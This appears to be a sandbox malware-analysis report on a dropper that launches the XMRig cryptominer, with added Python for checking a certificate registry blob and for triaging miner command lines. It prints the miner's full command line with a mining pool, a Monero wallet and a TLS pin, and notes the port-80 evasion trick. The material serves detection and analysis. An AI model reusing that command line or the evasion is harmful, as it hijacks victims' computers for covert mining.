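# Blob value from the behavioral17 'Set value (data)' row, one serialized property record
# per line: DWORD propid, DWORD reserved (always 1), DWORD cbData, then cbData data bytes.
BLOB_HEX = """
19000000 01000000 10000000 2aa1c05e2ae606f198c2c5e937c97aa2
03000000 01000000 14000000 d1eb23a46d17d68fd92564c2f1f1601764d8e349
1d000000 01000000 10000000 2e0d6875874a44c820912e85e964cfdb
14000000 01000000 14000000 a0110a233e96f107ece2af29ef82a57fd030a4b4
0b000000 01000000 1c000000 5300650063007400690067006f002000280041004100410029000000
62000000 01000000 20000000 d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4
53000000 01000000 43000000 30413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0
09000000 01000000 54000000 305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308
0f000000 01000000 14000000 3e8e6487f8fd27d322a269a71edaac5d57811286
20000000 01000000 36040000 308204323082031aa003020102020101300d06092a864886f70d0101050500
307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264
311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573
301e170d3034303130313030303030305a170d3238313233313233353935395a
307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264
311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573
30820122300d06092a864886f70d01010105000382010f003082010a0282010100
be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eea
f115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a8
91c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd9
42e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc9
0203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4
300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f04743072
3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c
3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c
300d06092a864886f70d01010505000382010100
0856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f
5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de5340
6c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74
d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e
"""
BLOB = bytes.fromhex("".join(BLOB_HEX.split()))

# wincrypt.h CERT_*_PROP_ID values present in this blob (0x53/0x62 come from the root-program update path).
PROP_NAMES = {0x03: "SHA1_HASH", 0x09: "ENHKEY_USAGE", 0x0B: "FRIENDLY_NAME", 0x0F: "SIGNATURE_HASH",
              0x14: "KEY_IDENTIFIER", 0x19: "SUBJECT_PUBLIC_KEY_MD5_HASH", 0x1D: "SUBJECT_NAME_MD5_HASH",
              0x20: "CERT", 0x53: "ROOT_PROGRAM_CERT_POLICIES", 0x62: "AUTH_ROOT_SHA256_HASH"}

def parse_cert_blob(blob):
    """Split the blob into (propid, data) records; reject truncated or foreign layouts."""
    props, off = [], 0
    while off < len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1 or off + 12 + length > len(blob):
            raise ValueError(f"malformed property record at offset {off}")
        props.append((prop_id, blob[off + 12:off + 12 + length]))
        off += 12 + length
    return props

def der_tlv(buf, off):
    """Minimal DER reader: (tag, value_start, value_end) of the element at off."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, off, off + length

def der_children(buf, start, end):
    """Yield the TLVs directly contained in buf[start:end]."""
    while start < end:
        tlv = der_tlv(buf, start)
        yield tlv
        start = tlv[2]

def subject_cn(cert):
    """Walk Certificate -> tbsCertificate -> subject and return its commonName."""
    _, tbs_off, _ = der_tlv(cert, 0)
    _, start, end = der_tlv(cert, tbs_off)
    fields = list(der_children(cert, start, end))
    subject = fields[5] if fields[0][0] == 0xA0 else fields[4]  # [0] version is optional
    for _, rdn_s, rdn_e in der_children(cert, subject[1], subject[2]):
        for _, atv_s, atv_e in der_children(cert, rdn_s, rdn_e):
            (_, oid_s, oid_e), (_, val_s, val_e) = der_children(cert, atv_s, atv_e)
            if cert[oid_s:oid_e] == bytes.fromhex("550403"):  # id-at-commonName
                return cert[val_s:val_e].decode("utf-8")
    return ""

def verify_authroot_entry(key_thumbprint, blob):
    """Cross-check the key name against the certificate the blob actually carries."""
    props = dict(parse_cert_blob(blob))
    cert = props[0x20]
    sha1 = hashlib.sha1(cert).hexdigest().upper()
    return {
        "properties": [PROP_NAMES.get(p, hex(p)) for p in props],
        "friendly_name": props[0x0B].decode("utf-16-le").rstrip("\x00"),
        "subject_cn": subject_cn(cert),
        "sha1_matches_key": sha1 == key_thumbprint.upper() == props[0x03].hex().upper(),
        "sha256_matches_stored": hashlib.sha256(cert).digest() == props[0x62],
        "key_id_in_cert": props[0x14] in cert,
        "root_program_properties": 0x53 in props and 0x62 in props,
    }
```

Call `verify_authroot_entry(KEY_THUMBPRINT, BLOB)` on any exported Blob value; a `False` in `sha1_matches_key` means the key name and the stored certificate disagree, which is the case that actually warrants a closer look. For a real investigation export the value with `reg.exe` from the affected host rather than re-typing it from a report.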
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2892 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2892 wrote to memory of 4492 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4104 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4080 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| GB | 23.44.234.16:80 | | tcp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4492-16-0x000001FA816A0000-0x000001FA816C0000-memory.dmp
memory/4492-17-0x000001FA816F0000-0x000001FA81710000-memory.dmp
memory/4492-18-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-19-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-20-0x000001FA81710000-0x000001FA81730000-memory.dmp
memory/4492-21-0x000001FA81730000-0x000001FA81750000-memory.dmp
memory/4492-22-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-23-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-24-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-25-0x000001FA81710000-0x000001FA81730000-memory.dmp
memory/4492-26-0x000001FA81730000-0x000001FA81750000-memory.dmp
memory/4492-27-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-28-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-29-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-30-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-31-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-32-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-33-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-34-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-35-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-36-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-37-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-38-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-39-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-40-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-41-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-42-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-43-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-44-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-45-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-46-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-47-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-48-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-49-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-50-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-51-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-52-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-53-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-54-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-55-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-56-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-57-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-58-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-59-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-60-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-61-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-62-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-63-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-64-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-65-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-66-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-67-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-68-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-69-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-70-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-71-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-72-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-73-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-74-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-75-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-76-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-77-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-78-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-79-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-80-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-81-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-82-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-83-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
memory/4492-84-0x00007FF6E5D00000-0x00007FF6E6803000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:38
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4280 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4280 wrote to memory of 1576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
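The miner command line is identical across the behavioral1, behavioral17 and behavioral18 detonations: a pool at pool.hashvault.pro, a 95-character Monero address passed as --user, xmrig's --donate-level, and TLS with the pool certificate pinned by --tls-fingerprint on port 80 rather than a conventional stratum port, so port-based egress filtering will not see the stratum session. The Python below is an added example, not part of the report and not xmrig's own code; it is the triage an analyst would run over the CommandLine field of process-creation telemetry to pull those fields out and decide whether a line is an xmrig-style miner. It understands xmrig's long and short option names and the --opt=value form, validates the wallet as a Monero address, and returns wallet, pool and fingerprint as IOCs. The "pool." host-prefix test stands in for a real pool-domain list, and the second and third sample lines are constructed (a renamed miner using short options and a scheme-prefixed pool, and a benign git invocation that also carries --option style arguments).

```python
import re
import shlex

# Monero mainnet standard address ('4...') or subaddress ('8...'): 95 base58 characters.
XMR_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# xmrig options that carry the pool, the wallet and the pinned pool certificate.
OPTIONS = {"--url": "pool", "-o": "pool", "--user": "wallet", "-u": "wallet",
           "--pass": "password", "-p": "password", "--tls-fingerprint": "tls_fingerprint",
           "--donate-level": "donate_level", "--coin": "coin", "--algo": "algo", "-a": "algo"}
FLAGS = {"--tls": "tls", "-k": "keepalive", "--keepalive": "keepalive",
         "-B": "background", "--background": "background"}

# Constructed sample; the first line is the xmrig command line from these detonations.
SAMPLE_CMDLINES = [
    "xmrig-6.21.0\\xmrig.exe --url pool.hashvault.pro:80 --user "
    "46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR"
    " --pass T --donate-level 1 --tls --tls-fingerprint "
    "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",
    # constructed: renamed binary, short options, scheme-prefixed pool, subaddress-style wallet
    "C:\\Users\\Public\\svchost.exe -o stratum+tcp://pool.example.invalid:3333 -u " + "8" + "A" * 94 + " -p x -k -B",
    # constructed: benign process whose arguments also look like --option value pairs
    '"C:\\Program Files\\Git\\cmd\\git.exe" -c user.name=build push --all origin',
]

def parse_miner_args(cmdline):
    """Collect xmrig-style options from one process command line (Windows quoting kept)."""
    fields, argv, i = {}, shlex.split(cmdline, posix=False), 0
    while i < len(argv):
        key, has_eq, inline = argv[i].partition("=")  # accept --url=host:port as well
        if key in OPTIONS:
            fields[OPTIONS[key]] = inline if has_eq else (argv[i + 1] if i + 1 < len(argv) else "")
            i += 1 if has_eq else 2
        else:
            if argv[i] in FLAGS:
                fields[FLAGS[argv[i]]] = True
            i += 1
    return fields

def triage_cmdline(cmdline):
    """Score one command line; two independent indicators are required for a miner verdict."""
    f = parse_miner_args(cmdline)
    reasons = []
    # pools commonly accept 'wallet.worker' or 'wallet+difficulty'; keep only the address
    wallet = re.split(r"[.+]", f.get("wallet", ""))[0]
    if XMR_ADDRESS.match(wallet):
        reasons.append("Monero address passed as --user")
    host, _, port = f.get("pool", "").rpartition(":")
    host = host.rsplit("//", 1)[-1]  # drop stratum+tcp:// or similar scheme prefixes
    if host.startswith("pool.") or "hashvault" in host:
        reasons.append(f"mining pool host {host}")
    if "tls_fingerprint" in f:
        reasons.append("pool certificate pinned with --tls-fingerprint")
    if "donate_level" in f:
        reasons.append("--donate-level is xmrig-specific")
    if port.isdigit() and int(port) in (80, 443) and f.get("tls"):
        reasons.append(f"stratum on web port {port} with TLS (evades port-based blocking)")
    verdict = "xmrig-like miner" if len(reasons) >= 2 else "no miner indicators"
    return {"verdict": verdict, "reasons": reasons,
            "iocs": {"wallet": wallet or None, "pool_host": host or None,
                     "pool_port": int(port) if port.isdigit() else None,
                     "tls_fingerprint": f.get("tls_fingerprint")}}
```

The wallet address and the TLS fingerprint are the durable indicators here: the dropper filename varies between runs (main - Copy (3) - Copy.exe, main - Copy (9).exe, main - Copy - Copy.exe) and the pool resolved to different addresses (95.179.241.203 and 45.76.89.70), while the address and the pinned certificate hash did not change.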
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1576-16-0x000001541D200000-0x000001541D220000-memory.dmp
memory/1576-17-0x000001541D250000-0x000001541D270000-memory.dmp
memory/1576-18-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-20-0x000001541EB50000-0x000001541EB70000-memory.dmp
memory/1576-19-0x000001541EB30000-0x000001541EB50000-memory.dmp
memory/1576-21-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-22-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-24-0x000001541EB30000-0x000001541EB50000-memory.dmp
memory/1576-25-0x000001541EB50000-0x000001541EB70000-memory.dmp
memory/1576-23-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-26-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-27-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-28-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-29-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-30-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-31-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-32-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-33-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-34-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-35-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-36-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-37-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-38-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-39-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-40-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-41-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-42-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-43-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-44-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-45-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-46-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-47-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-48-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-49-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-50-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-51-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-52-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-53-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-54-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-55-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-56-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-57-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-58-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-59-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-60-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-61-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-62-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-63-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-64-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-65-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-66-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-67-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-68-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-69-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-70-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-71-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-72-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
memory/1576-73-0x00007FF7C3CD0000-0x00007FF7C47D3000-memory.dmp
